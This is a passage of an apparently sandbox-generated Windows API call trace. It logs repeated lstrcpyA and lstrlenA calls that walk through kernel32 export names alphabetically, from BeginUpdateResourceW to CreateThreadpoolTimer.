lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.866] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.866] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.866] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.866] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.867] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.867] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.867] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.867] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.867] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.867] lstrlenA (lpString="CANCELIO") returned 8 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.867] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.867] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.867] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.867] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.867] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.867] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.867] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.867] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.867] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.867] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.867] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.867] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.867] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.868] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.868] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.868] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.868] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.868] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.868] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.868] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.868] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.868] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.868] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.868] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.868] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.868] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.869] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.869] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.869] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.869] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.869] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.869] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.869] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.869] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.869] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.869] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.869] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.869] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.869] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.869] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.869] lstrlenA (lpString="COPYFILEA") returned 9 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.869] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.869] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.869] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.869] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.870] lstrlenA (lpString="COPYFILEW") returned 9 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.870] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.870] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.870] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.870] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.870] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.870] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.870] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.870] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.870] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.870] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.870] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.870] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.870] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.870] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.870] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.870] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.870] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.871] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.871] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.871] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.871] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.871] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.871] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.871] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.871] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.871] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.871] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.871] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.871] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.871] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.871] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.871] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.871] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.871] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.871] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.871] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.872] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.872] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.872] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.872] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.872] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.872] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.872] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.872] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.872] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.872] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.872] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.872] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.872] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.872] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.872] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.872] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.872] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.872] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.873] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.873] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.873] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.873] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.873] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.873] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.873] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.873] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.873] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.873] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.873] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.873] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.873] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.873] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, 